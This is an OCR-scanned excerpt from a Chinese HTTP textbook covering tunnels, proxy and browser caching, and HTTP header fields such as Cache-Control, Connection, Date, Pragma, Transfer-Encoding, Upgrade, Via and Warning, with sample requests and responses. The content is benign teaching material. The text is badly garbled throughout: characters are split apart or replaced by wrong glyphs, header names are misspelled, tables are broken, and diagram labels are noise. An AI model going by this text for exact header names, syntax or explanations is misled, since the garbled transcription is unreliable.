隧道 可 按 要 求 建立 起 一 条 与 其 他 服务 器 的 通信 线路 ， 届 时 使 用 SSL 
等 加 密 手 段 进行 通信 。 隧 道 的 目的 是 确保 客户 端 能 与 服务 器 进行 安全 的 
通信 。 

障 道 本 身 不 会 去 解析 HTTP 请 求 。 也 就 是 说 ， 请 求 保持 原样 中 转 给 
之 后 的 服务 器 。 隧 道 会 在 通信 双方 断 开 连 接 时 结束 。 


建立 安全 的 通信 线路 





隧道 


图 : 通过 隧道 的 传输 ， 可 以 和 远 距离 的 服务 器 安全 通信 。 隧 道 本 身 是 透明 的 ， 
客户 端 不 用 在 意 隧 道 的 存在 
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5.3 ”保存 资源 的 缓存 


缓存 是 指 代 理 服务 人 或 客户 端 本 地 磁盘 内 保存 的 资源 副本 。 利 用 组 
存 可 减少 对 源 服务 器 的 访问 ， 因 此 也 就 节省 了 通信 流量 和 通信 和 时间 。 

缓存 服务 需 是 代理 服务 器 的 一 种 ， 并 归 类 在 缓存 代理 类 型 中 。 换 句 
话说 ， 当 代理 转发 从 服务 器 返回 的 响应 时 ， 代 理 服 务 器 将 会 保存 一 份 资 
源 的 副本 。 





缓存 服务 器 


转发 响应 时 , 复制 资源 后 
index.htm 1 保存 在 缓存 服务 器 上 


请 求 的 资源 如 果 已 经 被 缓存 则 直接 由 缓存 
服务 况 返 回 给 客 广 诡 


二 


. 
| BET Jindex. htm HTTPI an 
% 9 


= er i 





会 向 源 服 务 器 确认 
index.htm | 缓存 资源 的 有 效 性 





缓存 服务 器 


缓存 服务 器 的 优势 在 于 利用 缓存 可 避免 多 次 从 源 服务 大 转发 资源 。 
因此 客户 端 可 就 近 从 缓存 服务 器 上 获取 资源 ， 而 源 服务 仑 也 不 必 多 次 处 
理 相同 的 请 求 了 。 





a 


5.3.1 缓存 的 有 效 期 限 

即便 缓存 服务 器 内 有 缓存 ， 也 不 能 保证 每 次 都 会 返回 对 同 资源 的 请 
求 。 因 为 这 关系 到 被 缓存 资源 的 有 效 性 问题 。 

当 过 上 源 服务 右上 的 资源 更 新 时 ， 如 果 还 是 使 用 不 变 的 缓存 ， 那 就 
会 演变 成 返回 更 新 前 的 “ 旧 ” 资 源 了 。 

即使 存在 缓存 ， 也 会 因为 客户 端的 要 求 、 缓 存 的 有 效 期 等 因素 ， 同 ] 
源 服务 器 确认 资源 的 有 效 性 。 知 判断 缓存 失效 ， 缓 存 服 务 咒 将 会 再 次 从 
源 服务 央 上 获取 “新 ”资源 。 








这 个 决 在 狐 似 过 期 3， 我 
去 向 源 服 务 器 确认 下 | 


客户 端 缓存 服务 器 源 服务 器 
上 个 月 的 缓存 本 月 更 新 的 资源 


5.3.2 客户 端的 缓存 

缓存 不 仅 可 以 存在 于 缓存 服务 器 内 ， 还 可 以 存在 客户 端 浏 览 器 中 。 以 
Intemet Explorer 程序 为 例 ， 把 客户 端 缓存 称 为 临时 网 络 文件 ( Temporary 
Internet File )。 

浏览 售 绥 存 如 果 有 效 ， 就 不 必 上 再 困 服 务 右 请 求 相同 的 资源 了 ， 可 以 
直接 从 本 地 磁盘 内 读 取 。 

男 外 ， 和 缓存 服务 器 相 同 的 一 点 是 ， 当 判定 缓存 过 期 后 ， 会 向 源 服 
务 嫩 确认 资源 的 有 效 性 。 逢 判断 浏览 器 缓存 失效 ,浏览 器 会 再 次 请 求 新 
并 源 。 
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后 过 期 





我 向 汤 眼 务 器 


个 名 存 似 
确认 下 





了 


客户 庙 











第 6 章 
HTTP 首部 
HTTP 协 议 的 请 求 和 响应 报 文中 必定 包含 HTTP 首 部， 只 是 我 们 平 


时 在 使 用 Web 的 过 程 中 感受 不 到 它 。 本 章 我 们 一 起 来 学 习 HTTP 
首部 的 结构 ， 以 及 首部 中 各 字段 的 用 法 。 











ee 


6.1 HTTP 报 文 首部 


-| 一 不 要 P 满 和 服务 器 处 理 时 





图 : HTTP 报 文 的 结构 


HTTP 协议 的 请 求 和 响应 报 文 中 必定 包含 HTTP 首部 。 前 部 内 容 为 
客户 端 和 服务 器 分 别处 理 请 求 和 响应 提供 所 需要 的 信息 。 对 于 客户 端 用 
户 来 说 ， 这 些 信息 中 的 大 部 分 内 容 都 无 须 亲 日 查看 。 

报 文 症 部 由 几 个 字段 构成 。 


HTTP 请 求 报 文 
在 请 求 中 ，HTTP 报 文 由 方法 、URI、HTTP 版 本 、HTTP 首部 字段 
等 部 分 构成 。 











图 : 请 求 报 文 
下 面 的 示例 是 访问 http:/hackrjp 时 ， 请 求 报 文 的 首部 信息 。 


GET / HTTP/1.1 
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User-AMgent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/ 一 
20100101 Firefox/13.0 

Accept: text/html ,application/xhtml+xml,application/xml;g=0.9,33 
*/#*; gq=0.8 

Accept-Language: Ja,en-us;g=0.7,en;q=0.3 

Accept-Encoding: gzip, deflate 

DNT: 1 

Connection: keep-alive 

If-Modified-Since: Fri, 31 Aug 2007 02:02:20 GMT 
If-None-Match: "45bael-1l6a-46d776ac" 

Cache-Control: max-age=0 


HTTP 响应 报 文 


在 响应 中 ，HTTP 报 文 由 HTTP 版 本 、 状 态 码 (数字 和 原因 短语 )、 
HTTP 首部 字段 3 部 分 构成 。 


TS 
通用 首部 字段 


ea 





图 : 响应 报 文 


以 下 示例 是 之 前 请 求 访问 http://hackrjp/ 时 ， 返 回 的 啊 应 报 文 的 首 
部 信息 。 


HTTP/1.1 304 Not Modified 

Date: Thu, 07 Jun 2012 07:;21:36 GMT 
Server: Apache 

Connection: close 

Etag: "45bael-l6a-46d776ac" 


在 报 文 众多 的 字段 当中 ，HTTP 首部 字段 包含 的 信息 最 为 丰富 。 





一 局 装 同 要 
改 国 轩 国 。 


有 肥 部 字段 同时 存在 于 请 求 和 啊 应 报 文 内 ， 并 涵盖 HTTP 报 文 相 关 的 内 
容 信息 。 

因 HTTP 版 本 或 扩展 规范 的 变化 ， 首 部 字段 可 支持 的 字段 内 容 略 有 
不 同 。 本 书 主要 涉及 HTTP/1.1 及 常用 的 首部 字段 。 


6.2 HTTP 首部 字段 


6.2.1 HTTP 首部 字段 传递 重要 信息 

HTTP 首部 字段 是 构成 HTTP 报 文 的 要 素 之 一 。 在 客户 端 与 服务 器 
之 间 以 HTTP 协议 进行 通信 的 过 程 中 ， 无 论 是 请 求 还 是 响应 都 会 使 用 首 
部 字段 ， 它 能 起 到 传递 额外 重要 信息 的 作用 。 

使 用 首部 字段 是 为 了 给 浏览 器 和 服务 器 提供 报 文 主体 大 小 、 所 使 用 
的 语言 、 认 证 信息 等 内 容 。 









我 是 Apacke 了 服务器， 你 能 
分 种 后 再 过 来 访问 o9? 






f 我 正 使 用 的 这 个 浏览 器 只 能 
理解 中 文 ， 误 请 说 婴 . 


图 : 首部 字段 内 可 使 用 的 附加 信息 较 多 


6.2.2 HTTP 育 部 子 段 结 构 
HTTP 前 部 字段 是 由 首部 字段 名 和 字段 值 构成 的 ， 中 间 用 冒号 “ 
分 隔 。 


首部 字段 名 : 字段 值 
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例如 ,在 HTTP 首部 中 以 Content-Type 这 个 字段 来 表示 报 文 主体 的 
对 象 类 型 。 





就 以 上 述 示例 来 看 ， 首 部 字段 名 为 Content-Type， 字 符 串 text/html 
另外 ， 字 段 值 对 应 单个 HTTP 首部 字段 可 以 有 多 个 值 ， 如 下 所 示 。 





6.2.3 4 种 HTTP 首部 字段 类 型 
HTTP 自如 字段 根据 实际 用 途 被 分 为 以 下 4 种 类 型 。 


通用 首部 字段 ( General Header Fields ) 
请 求 报 文 和 响应 报 文 两 方 都 会 使 用 的 首部 。 








ee 


请 求 首部 字段 ( Request Header Fields ) 

从 客户 端 同 服务 器 端 发 送 请 求 报 文 时 使 用 的 首部 。 补 充 了 请 求 的 附 
加 内 容 、 客 户 端 信息 、 啊 应 内 容 相关 优先 级 等 信息 。 

响应 首部 字段 ( Response Header Fields ) 

从 服务 硕 端 回 客 户 端 返回 啊 应 报 文 时 使 用 的 首部 。 补 充 了 啊 应 的 附 
加 内 容 ， 也 会 要 求 客 户 闪 附加 额外 的 内 容 信息 。 

实体 首部 字段 ( Entity Header Fields ) 

针对 请 求 报 文 和 啊 应 报 文 的 实体 部 分 使 用 的 首部 。 补 充 了 资源 内 容 
更 新 时 间 等 与 实体 有 关 的 信息 。 


6.2.4 HTTP/1.1 首部 字段 一 览 
HTTP/1.1 规范 定义 了 如 下 47 种 首部 字段 。 


表 6-1: 通用 首部 字段 


首部 字段 名 。 | 说 明 
控制 缓存 的 行为 
Connection 。 | 逐 跌 首 部、 连接 的 管理 

[ES 创建 报 文 的 日 期 时 间 : | 


| 报 文 未 端 的 首部 一 览 

| 相 定 报 文 主 体 的 传输 编码 方 

i 
Ci 代理 服务 器 的 相关 信息 
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表 6-2: 请 求 肯 部 字段 
















优先 的 语言 ( 自然 语言 ) 






期 待 服务 器 的 特定 行为 。 
/ 用 户 的 电子 邮箱 地 址 
请 求 资源 所 在 服务 器 
比较 实体 标记 ( ETag ) 








| 
比较 资源 的 更 新 时 间 
比较 实体 标记 ( 与 -Match 相反 ) 






















资源 未 更 新 时 发 送 实体 Byte 的 范围 请 求 


ff-Unmodified-Since ”| 比较 资源 的 更 新 时 间 ( 与 -Modified-Since 相 反 ) 





有 


HTTP 客户 问 程 序 的 信息 








表 6- 3: 响应 自 部 字段 


Aeooptfianges | 是 否 接受 字 节 车 围 请 求 


Age | 推算 资源 创建 经 过 时 间 


资源 的 本 信息 
ETTTTTTETTT 





首部 字 耻 名 


| Proxy-Authenticate 。 | 代理 服务 器 对 客户 端的 认证 信息 

对 再 次 发 起 请 求 的 时 机 要 求 
代理 服务 器 缓存 的 管理 信息 = 

服务 器 对 客户 端的 认证 信息 


表 6-4: 实体 首部 字段 





Content-Length 实体 主体 的 大 小 (单位 ; 字 节 】 


Content-Location : 
| Content-Range / 实体 主体 的 位 置 范围 
实体 主体 这 期 的 日 期 
资源 的 最 后 修改 日 期 时 间 





6.2.5 非 HTTP/1.1 首部 字段 
在 HTTP 协议 通信 交互 中 使 用 到 的 首部 字段 ， 不 限于 RFC2616 中 
定义 的 47 种 首部 字段 。 还 有 Cookie、Set-Cookie 和 Content-Disposition 
等 在 其 他 RFC 中 定义 的 首部 字段 ， 它 们 的 使 用 频率 也 很 高 。 
这 些 非 正 式 的 首部 字段 统一 归纳 在 RFC4229 HTTP Header Field 
Registrations 中 。 
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6.2.6 End-to-end 首部 和 Hop-by-hop 首部 
HTTP 首部 字段 将 定义 成 缓存 代理 和 非 缓存 代理 的 行为 ， 分 成 2 种 
类 型 。 


端 到 端 首部 ( End-to-end Header ) 
分 在 此 类 别 中 的 首部 会 转发 给 请 求 / 啊 应 对 应 的 最 终 接收 目标 ， 且 
必须 保存 在 由 缓存 生成 的 响应 中 ， 另 外 规定 它 必 须 被 转发 。 


逐 跳 首部 ( Hop-by-hop Header ) 

分 在 此 类 别 中 的 首部 只 对 单 次 转发 有 效 ， 会 因 通过 缓存 或 代理 而 不 
再 转发 。HTTP/1.1 和 之 后 版 本 中 ， 如 果 要 使 用 hop-by-hop 首部 ， 
需 提 供 Connection 首部 字段 。 


下 面 列举 了 HTTP/1.1 中 的 逐 跳 首部 字段 。 除 这 8 个 首部 字段 之 外 ， 
其 他 所 有 字段 者 属于 端 到 端 首部 。 





和 Connection 
Keep-Alive 

® Proxy-Authenticate 
@ Proxy-Authorization 
@ Trailer 

@ TE 

® Transfer-ENncoding 


二 Upgrade 


6.3 HTTP/1.1 通用 首部 字段 
通用 首部 字段 是 指 ， 请 求 报 文 和 响应 报 文 双方 都 会 使 用 的 首部 。 


于 大 国画 
pn 





6.3.1 Cache-Control 
通过 指定 首部 字段 Cache-Control 的 指令 ， 就 能 操作 缓存 的 工作 机 制 。 





| ”如果 有 新 缚 存 请 给 我 ~ 






缓存 服务 器 


我 项 望 你 不 要 对 此 做 


看 者 噶 仲 -过 和 


图 : 首部 字段 Cache-Control 能 够 控制 缓存 的 行为 


加 指令 的 参数 是 可 选 的 ， 多 个 指令 之 间 通 过 “,” 分 隅 。 和 首部 宁 自 
084 Cache-Control 的 指令 可 用 于 请 求 及 啊 应 时 。 





Cache-Control: private, max-age=0, no-cache 


国 Cache-Control 指令 一 览 
可 用 的 指令 按 请 求 和 啊 应 分 类 如 下 所 示 。 


表 6-5: 缓存 请 求 指令 


强制 向 源 服务 器 再 次 验证 
不 缓存 请 求 或 响应 的 任何 内 容 


max-age =[ 秒 ] 啊 应 的 最 大 Age 值 


接收 已 过 期 的 响应 
| tndehy | 期 望 在 指定 时 间 内 的 响应 仍 有 效 
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no-store 
| no-transform | 
must-revalidate 


表示 是 否 能 缓存 的 指令 
public 指 令 


Cache-Control : Public 


当 指定 使 用 public 指令 时 ， 则 明确 表明 其 他 用 户 也 可 利用 绥 存 。 


se 


private 指令 












ee 
畦 化 





缓存 服务 器 产 服 务 强 
Cache-Control: private 


当 指 定 private 指令 后 ， 啊 应 只 以 特定 的 用 户 作 为 对 象 ， 这 与 public 
指令 的 行为 相反 。 
086 缓存 服务 器 会 对 该 特定 用 户 提供 资源 缓存 的 服务 ， 对 于 其 他 用 户 发 
送 过 来 的 请 求 ， 代 理 服务 器 则 不 会 返回 缓存 。 


no-cache 指令 


客户 端的 角度 







我 不 和 要 包 夺 过 由 ， 
请 给 我 从 斑 眼 务 器 
Sa- 


服务 器 的 角度 


Cache-Control: no-cache 
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使 用 no-cache 指令 的 目的 是 为 了 防止 从 缓存 中 返回 过 期 的 资源 。 

客户 端 发 送 的 请 求 中 如 果 包 含 no-cache 指令 ， 则 表示 客户 端 将 不 会 
接收 缓存 过 的 啊 应 。 于 是 ,“ 中 间 ” 的 缓存 服务 器 必须 把 客户 端 请 求 转 发 
给 源 服务 妖 。 

如 果 服 务 需 返回 的 啊 应 中 包含 no-cache 指令 ， 那么 缓存 服务 器 不 能 
对 资源 进行 缓存 。 源 服务 器 以 后 也 将 不 再 对 缓存 服务 器 请 求 中 提出 的 资 
源 有 效 性 进行 确认 ， 且 禁止 其 对 响应 资源 进行 缓存 操作 。 


Cache-Control: no-cache=Location 


由 服务 侣 返回 的 啊 应 中 ， 千 报 文 首 部 字段 Cache-Control 中 对 no- 
cache 字段 名 具体 指定 参数 值 ， 那 么 客户 端 在 接收 到 这 个 被 指定 参数 值 
的 首部 宁 段 对 应 的 啊 应 报 文 后 ， 就 不 能 使 用 缓存 。 换 言 之 ， 无 参数 值 的 
首部 字段 可 以 使 用 缓存 。 只 能 在 响应 指令 中 指定 该 参数 。 


控制 可 执行 缓存 的 对 象 的 指令 


no-store 指令 


Cache-Control: no-store 


当 使 用 no-store 指令 ” 时， 暗示 请 求 ( 和 对 应 的 响应 ) 或 响应 中 包 
含 机 密 信 息 。 
因此 ,该 指令 规定 缓存 不 能 在 本 地 存储 请 求 或 响应 的 任 一 部 4 


山 从 字面 意思 上 很 容易 把 no-cache 误 解 成 为 不 缓存 ,但 事实 上 no-cache 代 表 不 
缓存 过 期 的 资源 ， 缓 存 会 向 源 服务 器 进行 有 效 期 确认 后 处 理 资源 ， 也 许 称 为 
do-not-serve-from-cache-without-revalidation 更 合适 。no-store 才 是 真正 地 不 进 
行 缓 存 ， 请 读者 注意 区 别 理解 。 译 者 注 











指定 缓存 期 限 和 认证 的 指令 
s-maxage 指令 


Cache-Control:; s-maxage=604800 | 单位. 秒 ) 


s-maxage 指令 的 功能 和 max-age 指令 的 相同 ， 它 们 的 不 同 点 是 
s-maxage 指令 只 适用 于 供 多 位 用 户 使 用 的 公共 缓存 服务 器 “。 也 就 是 说 ， 
对 于 加 同一 用 户 重 复 返 回 啊 应 的 服务 器 来 说 ， 这 个 指令 没有 任何 作用 。 

男 外 ， 当 使 用 s-maxage 指令 后 ， 则 直接 忽略 对 Expires 首部 字段 及 
max-age 指令 的 处 理 。 


max-age 指 令 


客户 端的 角度 





旱 星 弹 和 存 过 期 没 超过 一 
” 周 ， 就 杷 它 给 我 








缓存 服务 器 


一 周 内 不 学 下 向 我 确认 ， 
\、 你 直接 支配 该 绢 存 好 了 


服务 器 的 角度 


Cache-Control: max-age=604800 ( 单位 , 秘 ) 


当 客 户 端 发 送 的 请 求 中 包含 max-age 指令 时 ， 如 果 判 定 缓存 资源 的 


(DD 这 里 一 般 指 代理 。 一 一 译 者 注 
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gr 一 


缓存 时 间 数 值 比 指定 时 间 的 数值 更 小 ， 那 么 客户 端 就 接收 缓存 的 资源 。 
另外 ， 当 指定 max-age 值 为 0， 那 么 缓存 服务 器 通常 需要 将 请 求 转发 给 
源 服务 器 。 

当 服 务 器 返回 的 响应 中 包含 max-age 指令 时 ， 缓 存 服务 器 将 不 对 资 
源 的 有 效 性 再 作 确 认 ， 而 max-age 数值 代表 资源 保存 为 缓存 的 最 长 时 间 。 

应 用 HTTP/1.1 版 本 的 缓存 服务 器 遇 到 同时 存在 Expires 首部 字段 的 
情况 时 ， 会 优先 处 理 max-age 指令 ， 而 忽略 掉 Expires 首部 字段 。 而 
HTTP/1.0 版 本 的 缓存 服务 器 的 情况 却 相 反 ，max-age 指令 会 被 忽略 掉 。 


min-fresh 指令 






这 强压 再 过 60 秒 还 稼 








缓存 服务 器 


Cache-Control: min-fresh=60 | 单位 . 秒 ) i 


min-fresh 指令 要 求 缓存 服务 需 返 回 至 少 还 未 过 指定 时 间 的 缓存 资源 。 
比如 ， 当 指定 min-fresh 为 60 秒 后 ， 过 了 60 秒 的 资源 都 无 法 作为 
啊 应 返回 了 。 


max-stale 指令 


Cache-Control: max-stale=3600 | 单位: 种) 


一 一 一 到 一 三 一 C= 


使 用 max-stale 可 指示 缓存 资源 ， 即 使 过 期 也 照 贡 接收 。 

如 果 指 令 未 指定 参数 值 ， 那 么 无 论 经 过 多 久 ， 客 户 端 都 会 接收 响应 ; 
如 果 指 令 中 指定 了 有 具体 数值 ， 那 么 即使 过 期 ， 只 要 仍 处 于 max-stale 指定 
的 时 间 内 ， 仍 旧 会 被 客户 端 接收 。 


only-if-cached 指令 


Cache-Control: only-if-cached 


使 用 only-if-cached 指令 表示 客户 端 仅 在 缓存 服务 器 本 地 缓存 目标 
资源 的 情况 下 才 会 要 求 其 返回 。 换 言 之 ， 该 指令 要 求 缓存 服务 器 不 重新 
加 载 响应 ， 也 不 会 再 次 确认 资源 有 效 性 。 者 发生 请 求 缓 仔 服 务 侦 的 本 地 
缓存 无 啊 应 ， 则 返回 状态 码 504 Gateway Timeout。 


= 


must-revalidate 指令 


Cache-Control; must-revalidate 


使 用 must-revalidate 指令 ， 代 理会 回 源 服务 寓 髓 次 验证 即将 返回 的 
啊 应 缓存 目前 是 否 仍 然 有 效 。 

若 代 理 无 法 连通 源 服务 器 青 次 获取 有 效 资 源 的 话 ， 缓 存 必须 给 客户 
端 一 条 504( Gateway Timeout ) 状态 码 。 

另外 ， 使 用 must-revalidate 指令 会 忽略 请 求 的 max-stale 指令 (即使 
已 经 在 首部 使 用 了 max-stale， 也 不 会 再 有 效果 )。 


proxy-revalidate 指令 


~ Cache-Control: proxy-revalidate 
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.= ee re 








proxy-revalidate 指令 要 求 所 有 的 缓存 服务 器 在 接收 到 客户 端 市 有 该 
指令 的 请 求 返 回 啊 应 之 前 ， 必 须 再 次 验证 缓存 的 有 效 性 。 


no-transform 指令 


Cache-Control: no-transform | 


使 用 no-transform 指令 规定 无 论 是 在 请 求 还 是 啊 应 中 ， 绥 存 都 不 能 
改变 实体 主体 的 媒体 类 型 。 
这 样 做 可 防止 缓存 或 代理 压缩 图 片 等 类 似 操作 。 


Cache-Control 扩展 


cache-extension token 


Cache-Control: private, community="UCI" 


通过 cache-extension 标记 ( token )， 可 以 扩展 Cache-Control 首部 字 
段 内 的 指令 。 

如 上 例 ，Cache-Control 首部 字段 本 身 没 有 community 这 个 指令 。 借 
助 extension tokens 实现 了 该 指令 的 添加 。 如 采 组 存 服务 希 不 能 理解 
community 这 个 新 指令 ， 融 会 直接 忽略 。 因 此 ，extension tokens 仅 对 能 
理解 它 的 缓存 服务 器 来 说 是 有 意义 的 。 


6.3.2 Connection 
Connection 首部 字段 具备 如 下 两 个 作用 。 


e 控制 不 再 转发 给 代理 的 首部 字段 
e 管理 持久 连接 





国 控 制 不 再 转发 给 代理 的 首部 字段 


GET / HTTP/1.1 GET / HTTP/1.1 
首部 字段 Upgrade 被 删除 后 再 转发 


Upgrade: HTTP/1.1 
Connection: Upgrade 





Connection: 不 再 转发 的 首部 字段 名 


在 客户 病 发 送 请 求 和 服务 硕 返 回 啊 应 内 ， 使 用 Connection 首部 字 
段 ， 可 控制 不 再 枝 发 给 代理 的 首部 字段 ( 即 Hop-by-hop 首部 )。 


图 宵 理 持久 连接 


Connection close 








这 下 我 和 你 的 关系 
暂且 结束 了 


Connection: close 


i a 
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HTTP/1.1 版 本 的 默认 连接 都 是 持久 连接 。 为 此 ， 客 户 端 会 在 持久 
连接 上 连续 发 送 请 求 。 当 服务 器 端 想 明确 断 开 连接 时 ， 则 指定 
Connection 自 部 字段 的 值 为 Close。 


1 GET / BITP/L;1 
Connection: Keep-Alive 





客户 端 Di HTTP/1.1 200 OK 


Keep-Alive: timeout=10, max=500 
Connection: Keep-Alivwe 





Connection: Keep-Alive 


HTTP/1.1 之 前 的 HTTP 版 本 的 默认 连接 都 是 非 持 久 连 接 。 为 此 ， 
如 果 想 在 旧版 本 的 HTTP 协议 上 维持 持续 连接 ， 则 需要 指定 Connection 
首部 字段 的 值 为 Keep-Alive。 

如 上 图 山 所 示 ， 客户 端 发 送 请 求 给 服务 器 时 ， 服务 器 端 会 像 上 图 2 
那样 加 上 首部 字段 Keep-Alive 及 首部 字段 Connection 后 返回 啊 应 。 


6.3.3 Date 
首部 字段 Date 表明 创建 HTTP 报 文 的 日 期 和 时 间 。 


HTTP 报 文 创建 于 2012 
年 7 月 3 日 (周三 3》4 占 








HTTP/1.1 协议 使 用 在 RFC1123 中 规定 的 日 期 时 间 的 格式 ， 如 下 
示例 。 


Date: Tue, 03 Jul 2012 04:40:59 GMT 


之 前 的 HTTP 协议 版 本 中 使 用 在 RFC850 中 定义 的 格式 ， 如 下 
所 示 。 


Date: Tue，03=Uul-1l2 04:40:59 GMT 


除 此 之 外 ， 还 有 一 种 格式 。 它 与 C 标准 库 内 的 asctime() 困 数 的 输 


Date: Tue Jul 03 04:40:59 2012 


6.3.4 Pragma 

Pragma 是 HTTP/1.1 之 前 版 本 的 历史 遗留 字段 ， 仅 作为 与 HTTP/1.0 
的 向 后 兼容 而 定义 。 

规范 定义 的 形式 唯一 ， 如 下 所 示 。 


Pragma: no-cache 


该 首部 字段 属于 通用 首部 字段 ,但 只 用 在 客 尸 问 发 送 的 请 求 中 。 客 
户 端 会 要 求 所 有 的 中 间 服 务 需 不 返回 缓存 的 质 源 。 
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我 不 排 收 绎 在 | 





中 间 服 务 器 

所 有 的 中 间 服 务 器 如 果 都 能 以 HTTP/1.1 为 基准 ， 那 直接 采用 
Cache-Control: no-cache 指定 缓存 的 处 理 方 式 是 最 为 理想 的 。 但 要 整体 
掌握 全 部 中 间 服 务 需 使 用 的 HTTP 协议 版 本 却 是 不 现实 的 。 因 此 ， 发 送 
的 请 求 会 同时 含有 下 面 两 个 首部 字段 。 


Cache-Control: no-cache 
Pragma: no-cache 


6.3.5 Trailer 









/在 报 文 曲 景 后 写 了 很 
重 委 内 东西 ， 记 得 于 
、 仔细 间 访 咯 | 








~ 
服务 器 

首部 字段 Trailer 会 事先 说 明 在 报 文 主体 后 记录 了 哪些 首部 字段 。 该 
首部 字段 可 应 用 在 HTTP/1.1 版 本 分 块 传输 编码 时 。 


HTTP/1.1 200 OK 
Date: Tue, 03 Jul 2012 04:40:56 GMT 
Content-Type: text/html 





Transfer-Encoding: chunked 
Trailer: Expires 


... ( 报 文 主体 )，: 


0 
Expires: Tue, 28 Sep 2004 23:59:59 GMT 


以 上 用 例 中 ， 指 定 首部 字段 Trailer 的 值 为 Expires， 在 报 文 主体 之 
后 (分 块 长 度 0 之 后 ) 出 现 了 首部 字段 Expires。 


6.3.6 Transfer-Encoding 






【用 这 种 传输 坊 码 方式 发 送 叶 





服务 器 


首部 字段 Transfer-Encoding 规定 了 传输 报 文 主体 时 采用 的 编码 
方式 。 
HTTP/1.1 的 传输 编码 方式 仅 对 分 块 传输 编码 有 效 。 


HTTP/1.1 200 OK 

Date: Tue, 03 Jul 2012 04:40:56 GMT 
Cache-Control: public, max-age=604800 
Content-Type: text/javascript; charset=utf-8 
Expires: Tue, 10 Jul 2012 04:40:56 GMT 
xX-Frame-Options: DENY 

X-XSS-Protection: 1; mode=block 
Content-Encoding: gzip 
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Transfer-Encoding: chunked 
Connection: keep-alive 
cf0 ”二 16 进 制 (10 进 制 为 3312) 
. . .3312 字 节 分 块 数据 . . . 
392 ”16 进 制 (10 进 制 为 914) 
-914 字 节 分 块 数据 -  . 


0 


以 上 用 例 中 ， 正 如 在 首部 字段 Transfer-Encoding 中 指定 的 那样 ， 有 
效 使 用 分 块 传输 编码 ， 且 分 别 被 分 成 3312 字 节 和 914 字 节 大 小 的 分 块 
数据 。 


6.3.7 Upgrade 
首部 字段 Upgrade 用 于 检测 HTTP 协议 及 其 他 协议 是 否 可 使 用 更 高 
的 版 本 进行 通信 ， 其 参数 值 可 以 用 来 指定 一 个 完全 不 同 的 通信 协议 。 





; 紫 i 丰 我 使 用 这 个 协议 吗 ? 








GET /index.htm HTTP/1.1 
Upgrade: TLS/1.0 
Connection: Upgrade 





HTTIP/1 .1 101 Switching Protocols 
Upgrade: TLS/1.0, HTTP/1.1 服务 器 
Connecticn: Upgrade 


上 图 用 例 中 ， 首 部 字段 Upgrade 指定 的 值 为 TLS/1.0。 请 注意 此 处 
两 个 字段 首部 字段 的 对 应 关系 ，Connection 的 值 被 指定 为 Upgrade。 
Upegrade 首部 字段 产生 作用 的 Upgrade 对 象 仅 限于 客户 端 和 邻接 服务 顺 





之 间 。 因 此 ， 使 用 首部 字段 Upgrade 时 ， 还 需要 额外 指定 Connection: 
Upgrade。 

对 于 附 有 首部 字段 Upgrade 的 请 求 ， 服 务 器 可 用 101 Switching 
Protocols 状态 码 作 为 响应 返回 。 


6.3.8 Via 

使 用 首部 字段 Via 是 为 了 追踪 客户 端 与 服务 器 之 间 的 请 求 和 响应 报 
文 的 传输 路 径 。 

报 文 经 过 代理 或 网 关 时 ， 会 先 在 首部 字段 Via 中 附加 该 服务 器 的 信 
息 ， 然 后 再 进行 转发 。 这 个 做 法 和 traceroute 及 电子 邮件 的 Received 首 
部 的 工作 机 制 很 类 似 。 

首部 字段 Via 不 仅 用 于 追踪 报 文 的 转发 ， 还 可 避免 请 求 回 环 的 发 
生 。 所 以 必须 在 经 过 代理 时 附加 该 首部 字段 内 容 。 





dd) GET / HTTP/1.1 


客户 庙 ™s 


代理 服务 器 人 


© _ GET / HITP/1.1 
Via: 1.0 gw.hackr.jpl Squid/3.1) 





py 3) GET / HTTP/1.1 
Via: 1.0 gw.hackr.jp(l Squid/3.1), 
1.1 al.example.coml| Sqguid/2.7) 







代理 服务 器 B “SS 和 





各 个 代理 服务 器 会 往 Via 首 部 添加 自 
身 服务 器 的 信息 。 






上 图 用 例 中 ， 在 经 过 代理 服务 器 A 时 ，Via 首部 附加 了 “1.0 gw. 
hackr.jp (Squid/3.1)” 这 样 的 字符 串 值 。 行头 的 1.0 是 指 接收 请 求 的 服务 
器 上 应 用 的 HTTP 协议 版 本 。 接 下 来 经 过 代理 服务 器 B 时 亦 是 如 此 ， 
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re = 


在 Via 首部 附加 服务 器 信息 ， 也 可 增加 1 个 新 的 Via 首部 写 人 服务 器 
信息 。 

Via 首部 是 为 了 追踪 传输 路 径 ， 所 以 经 常会 和 TRACE 方法 一 起 使 
用 。 比 如 ,代理 服务 器 接收 到 由 TRACE 方法 发 送 过 来 的 请 求 (其 中 
Max-Forwards: 0 ) 时 ， 代理 服务 器 就 不 能 再 转发 该 请 求 了 。 这 种 情 
况 下 ， 代 理 服务 需 会 将 自身 的 信息 附加 到 Via 首部 后 ， 返 回 该 请 求 的 
响应 。 


6.3.9 Warning 


HTTP/1.1 的 Warming 首部 是 从 HTTP/1.0 的 响应 首部 ( Retry-After ) 
演变 过 来 的 。 该 首部 通常 会 告知 用 户 一 些 与 缓存 相关 的 问题 的 警告 。 


Warning: 113 gw.hackr.jp:8080 "Heuristic expiration" Tue, 03 Jul 3S 
2012 05:09:44 GMT 





Warning 首部 的 格式 如 下 。 最 后 的 日 期 时 间 部 分 可 省 略 。 
Warning: [警告 码 ] [警告 的 主机 : 端口 号 ] “ [警告 内 容 ] ”([ 日 期 时 间 ]) 
HTTP/1.1 中 定义 了 7 种 警告 。 警 告 码 对 应 的 警告 内 容 仅 推荐 参考 。 


另外 ， 守 告 码 具 备 扩展 性 ， 今 后 有 可 能 追加 新 的 警告 码 。 


表 6-7: HTTP/1.1 警告 码 


代理 再 验证 资源 有 效 性 时 失败 ( 服务 


| 器 无 法 到 达 等 原因 ) 





aaa 


响应 的 使 用 期 超过 24 小 时 ( 有 效 缓存 
的 设 定时 间 大 于 24 小 时 的 情况 下 ) 


Transformation applied ( 使 用 了 转换 ) | 代理 对 内 容 编码 或 媒体 类 型 等 执行 了 | 


Miscellaneous persistent warning 


( 持久 杂项 警告 ) 





6.4 ”请 求 首部 字段 


请 求 首 部 字段 是 从 客户 端 往 服务 器 端 发 送 请 求 报 文中 所 使 用 的 字 
段 ， 用 于 补充 请 求 的 附加 信息 、 客 户 端 信息 、 对 响应 内 容 相关 的 优先 级 
葡 等 内 容 。 






我 轩 发 渤 过 来 3 哑 


图 : HTTP 请 求 报 文中 使 用 的 首部 字段 
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6.4.1 Accept 











那 份 次 天 昌 好 发 给 我 HTML 
梅 式 的 ， 如 果 没 有 ， 发 给 我 | 
